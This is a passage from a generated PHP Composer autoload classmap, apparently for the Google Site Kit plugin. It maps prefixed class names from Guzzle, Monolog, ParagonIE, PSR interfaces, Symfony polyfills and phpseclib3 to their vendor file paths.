'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\StreamDecoratorTrait' => $baseDir . '/guzzlehttp/psr7/src/StreamDecoratorTrait.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\StreamWrapper' => $baseDir . '/guzzlehttp/psr7/src/StreamWrapper.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\UploadedFile' => $baseDir . '/guzzlehttp/psr7/src/UploadedFile.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Uri' => $baseDir . '/guzzlehttp/psr7/src/Uri.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\UriComparator' => $baseDir . '/guzzlehttp/psr7/src/UriComparator.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\UriNormalizer' => $baseDir . '/guzzlehttp/psr7/src/UriNormalizer.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\UriResolver' => $baseDir . '/guzzlehttp/psr7/src/UriResolver.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Utils' => $baseDir . '/guzzlehttp/psr7/src/Utils.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\RedirectMiddleware' => $baseDir . '/guzzlehttp/guzzle/src/RedirectMiddleware.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\RequestOptions' => $baseDir . '/guzzlehttp/guzzle/src/RequestOptions.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\RetryMiddleware' => $baseDir . '/guzzlehttp/guzzle/src/RetryMiddleware.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\TransferStats' => $baseDir . '/guzzlehttp/guzzle/src/TransferStats.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Utils' => $baseDir . '/guzzlehttp/guzzle/src/Utils.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Attribute\\AsMonologProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Attribute/AsMonologProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\DateTimeImmutable' => $baseDir . '/monolog/monolog/src/Monolog/DateTimeImmutable.php', 'Google\\Site_Kit_Dependencies\\Monolog\\ErrorHandler' => $baseDir . '/monolog/monolog/src/Monolog/ErrorHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\ChromePHPFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/ChromePHPFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\ElasticaFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/ElasticaFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\ElasticsearchFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/ElasticsearchFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\FlowdockFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/FlowdockFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\FluentdFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/FluentdFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\FormatterInterface' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/FormatterInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\GelfMessageFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/GelfMessageFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\GoogleCloudLoggingFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/GoogleCloudLoggingFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\HtmlFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/HtmlFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\JsonFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/JsonFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\LineFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/LineFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\LogglyFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/LogglyFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\LogmaticFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/LogmaticFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\LogstashFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/LogstashFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\MongoDBFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\NormalizerFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/NormalizerFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\ScalarFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/ScalarFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Formatter\\WildfireFormatter' => $baseDir . '/monolog/monolog/src/Monolog/Formatter/WildfireFormatter.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\AbstractHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/AbstractHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\AbstractProcessingHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\AbstractSyslogHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\AmqpHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/AmqpHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\BrowserConsoleHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/BrowserConsoleHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\BufferHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/BufferHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ChromePHPHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ChromePHPHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\CouchDBHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/CouchDBHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\CubeHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/CubeHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\Curl\\Util' => $baseDir . '/monolog/monolog/src/Monolog/Handler/Curl/Util.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\DeduplicationHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/DeduplicationHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\DoctrineCouchDBHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/DoctrineCouchDBHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\DynamoDbHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ElasticaHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ElasticaHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ElasticsearchHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ElasticsearchHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ErrorLogHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ErrorLogHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FallbackGroupHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FallbackGroupHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FilterHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FilterHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FingersCrossedHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FingersCrossedHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FingersCrossed\\ActivationStrategyInterface' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FingersCrossed/ActivationStrategyInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FingersCrossed\\ChannelLevelActivationStrategy' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FingersCrossed/ChannelLevelActivationStrategy.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FingersCrossed\\ErrorLevelActivationStrategy' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FingersCrossed/ErrorLevelActivationStrategy.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FirePHPHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FirePHPHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FleepHookHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FleepHookHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FlowdockHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FlowdockHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FormattableHandlerInterface' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FormattableHandlerInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\FormattableHandlerTrait' => $baseDir . '/monolog/monolog/src/Monolog/Handler/FormattableHandlerTrait.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\GelfHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/GelfHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\GroupHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/GroupHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\Handler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/Handler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\HandlerInterface' => $baseDir . '/monolog/monolog/src/Monolog/Handler/HandlerInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\HandlerWrapper' => $baseDir . '/monolog/monolog/src/Monolog/Handler/HandlerWrapper.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\IFTTTHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/IFTTTHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\InsightOpsHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/InsightOpsHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\LogEntriesHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/LogEntriesHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\LogglyHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/LogglyHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\LogmaticHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/LogmaticHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\MailHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/MailHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\MandrillHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/MandrillHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\MissingExtensionException' => $baseDir . '/monolog/monolog/src/Monolog/Handler/MissingExtensionException.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\MongoDBHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\NativeMailerHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/NativeMailerHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\NewRelicHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/NewRelicHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\NoopHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/NoopHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\NullHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/NullHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\OverflowHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/OverflowHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\PHPConsoleHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/PHPConsoleHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ProcessHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ProcessHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ProcessableHandlerInterface' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ProcessableHandlerInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ProcessableHandlerTrait' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ProcessableHandlerTrait.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\PsrHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/PsrHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\PushoverHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/PushoverHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\RedisHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/RedisHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\RedisPubSubHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/RedisPubSubHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\RollbarHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/RollbarHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\RotatingFileHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SamplingHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SamplingHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SendGridHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SendGridHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SlackHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SlackHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SlackWebhookHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SlackWebhookHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\Slack\\SlackRecord' => $baseDir . '/monolog/monolog/src/Monolog/Handler/Slack/SlackRecord.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SocketHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SocketHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SqsHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SqsHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\StreamHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/StreamHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SwiftMailerHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SwiftMailerHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SymfonyMailerHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SymfonyMailerHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SyslogHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SyslogHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SyslogUdpHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\SyslogUdp\\UdpSocket' => $baseDir . '/monolog/monolog/src/Monolog/Handler/SyslogUdp/UdpSocket.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\TelegramBotHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\TestHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/TestHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\WebRequestRecognizerTrait' => $baseDir . '/monolog/monolog/src/Monolog/Handler/WebRequestRecognizerTrait.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\WhatFailureGroupHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/WhatFailureGroupHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Handler\\ZendMonitorHandler' => $baseDir . '/monolog/monolog/src/Monolog/Handler/ZendMonitorHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\LogRecord' => $baseDir . '/monolog/monolog/src/Monolog/LogRecord.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Logger' => $baseDir . '/monolog/monolog/src/Monolog/Logger.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\GitProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/GitProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\HostnameProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/HostnameProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\IntrospectionProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/IntrospectionProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\MemoryPeakUsageProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/MemoryPeakUsageProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\MemoryProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/MemoryProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\MemoryUsageProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/MemoryUsageProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\MercurialProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\ProcessIdProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/ProcessIdProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\ProcessorInterface' => $baseDir . '/monolog/monolog/src/Monolog/Processor/ProcessorInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\PsrLogMessageProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/PsrLogMessageProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\TagProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/TagProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\UidProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/UidProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Processor\\WebProcessor' => $baseDir . '/monolog/monolog/src/Monolog/Processor/WebProcessor.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Registry' => $baseDir . '/monolog/monolog/src/Monolog/Registry.php', 'Google\\Site_Kit_Dependencies\\Monolog\\ResettableInterface' => $baseDir . '/monolog/monolog/src/Monolog/ResettableInterface.php', 'Google\\Site_Kit_Dependencies\\Monolog\\SignalHandler' => $baseDir . '/monolog/monolog/src/Monolog/SignalHandler.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Test\\TestCase' => $baseDir . '/monolog/monolog/src/Monolog/Test/TestCase.php', 'Google\\Site_Kit_Dependencies\\Monolog\\Utils' => $baseDir . '/monolog/monolog/src/Monolog/Utils.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base32' => $baseDir . '/paragonie/constant_time_encoding/src/Base32.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base32Hex' => $baseDir . '/paragonie/constant_time_encoding/src/Base32Hex.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base64' => $baseDir . '/paragonie/constant_time_encoding/src/Base64.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base64DotSlash' => $baseDir . '/paragonie/constant_time_encoding/src/Base64DotSlash.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base64DotSlashOrdered' => $baseDir . '/paragonie/constant_time_encoding/src/Base64DotSlashOrdered.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Base64UrlSafe' => $baseDir . '/paragonie/constant_time_encoding/src/Base64UrlSafe.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Binary' => $baseDir . '/paragonie/constant_time_encoding/src/Binary.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\EncoderInterface' => $baseDir . '/paragonie/constant_time_encoding/src/EncoderInterface.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Encoding' => $baseDir . '/paragonie/constant_time_encoding/src/Encoding.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\Hex' => $baseDir . '/paragonie/constant_time_encoding/src/Hex.php', 'Google\\Site_Kit_Dependencies\\ParagonIE\\ConstantTime\\RFC4648' => $baseDir . '/paragonie/constant_time_encoding/src/RFC4648.php', 'Google\\Site_Kit_Dependencies\\Psr\\Cache\\CacheException' => $baseDir . '/psr/cache/src/CacheException.php', 'Google\\Site_Kit_Dependencies\\Psr\\Cache\\CacheItemInterface' => $baseDir . '/psr/cache/src/CacheItemInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Cache\\CacheItemPoolInterface' => $baseDir . '/psr/cache/src/CacheItemPoolInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Cache\\InvalidArgumentException' => $baseDir . '/psr/cache/src/InvalidArgumentException.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Client\\ClientExceptionInterface' => $baseDir . '/psr/http-client/src/ClientExceptionInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Client\\ClientInterface' => $baseDir . '/psr/http-client/src/ClientInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Client\\NetworkExceptionInterface' => $baseDir . '/psr/http-client/src/NetworkExceptionInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Client\\RequestExceptionInterface' => $baseDir . '/psr/http-client/src/RequestExceptionInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\MessageInterface' => $baseDir . '/psr/http-message/src/MessageInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\RequestFactoryInterface' => $baseDir . '/psr/http-factory/src/RequestFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\RequestInterface' => $baseDir . '/psr/http-message/src/RequestInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\ResponseFactoryInterface' => $baseDir . '/psr/http-factory/src/ResponseFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\ResponseInterface' => $baseDir . '/psr/http-message/src/ResponseInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\ServerRequestFactoryInterface' => $baseDir . '/psr/http-factory/src/ServerRequestFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\ServerRequestInterface' => $baseDir . '/psr/http-message/src/ServerRequestInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\StreamFactoryInterface' => $baseDir . '/psr/http-factory/src/StreamFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\StreamInterface' => $baseDir . '/psr/http-message/src/StreamInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\UploadedFileFactoryInterface' => $baseDir . '/psr/http-factory/src/UploadedFileFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\UploadedFileInterface' => $baseDir . '/psr/http-message/src/UploadedFileInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\UriFactoryInterface' => $baseDir . '/psr/http-factory/src/UriFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Http\\Message\\UriInterface' => $baseDir . '/psr/http-message/src/UriInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\AbstractLogger' => $baseDir . '/psr/log/Psr/Log/AbstractLogger.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\InvalidArgumentException' => $baseDir . '/psr/log/Psr/Log/InvalidArgumentException.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\LogLevel' => $baseDir . '/psr/log/Psr/Log/LogLevel.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\LoggerAwareInterface' => $baseDir . '/psr/log/Psr/Log/LoggerAwareInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\LoggerAwareTrait' => $baseDir . '/psr/log/Psr/Log/LoggerAwareTrait.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\LoggerInterface' => $baseDir . '/psr/log/Psr/Log/LoggerInterface.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\LoggerTrait' => $baseDir . '/psr/log/Psr/Log/LoggerTrait.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\NullLogger' => $baseDir . '/psr/log/Psr/Log/NullLogger.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\Test\\DummyTest' => $baseDir . '/psr/log/Psr/Log/Test/DummyTest.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\Test\\LoggerInterfaceTest' => $baseDir . '/psr/log/Psr/Log/Test/LoggerInterfaceTest.php', 'Google\\Site_Kit_Dependencies\\Psr\\Log\\Test\\TestLogger' => $baseDir . '/psr/log/Psr/Log/Test/TestLogger.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Intl\\Idn\\Idn' => $baseDir . '/symfony/polyfill-intl-idn/Idn.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Intl\\Idn\\Info' => $baseDir . '/symfony/polyfill-intl-idn/Info.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Intl\\Idn\\Resources\\unidata\\DisallowedRanges' => $baseDir . '/symfony/polyfill-intl-idn/Resources/unidata/DisallowedRanges.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Intl\\Idn\\Resources\\unidata\\Regex' => $baseDir . '/symfony/polyfill-intl-idn/Resources/unidata/Regex.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Intl\\Normalizer\\Normalizer' => $baseDir . '/symfony/polyfill-intl-normalizer/Normalizer.php', 'Google\\Site_Kit_Dependencies\\Symfony\\Polyfill\\Php72\\Php72' => $baseDir . '/symfony/polyfill-php72/Php72.php', 'Google\\Site_Kit_Dependencies\\cweagans\\Composer\\PatchEvent' => $baseDir . '/cweagans/composer-patches/src/PatchEvent.php', 'Google\\Site_Kit_Dependencies\\cweagans\\Composer\\PatchEvents' => $baseDir . '/cweagans/composer-patches/src/PatchEvents.php', 'Google\\Site_Kit_Dependencies\\cweagans\\Composer\\Patches' => $baseDir . '/cweagans/composer-patches/src/Patches.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Common\\Functions\\Strings' => $baseDir . '/phpseclib/phpseclib/phpseclib/Common/Functions/Strings.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\AES' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/AES.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Blowfish' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Blowfish.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\ChaCha20' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/ChaCha20.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\AsymmetricKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/AsymmetricKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\BlockCipher' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/BlockCipher.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\JWK' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/JWK.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\OpenSSH' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/OpenSSH.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\PKCS' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\PKCS1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\PKCS8' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS8.php', 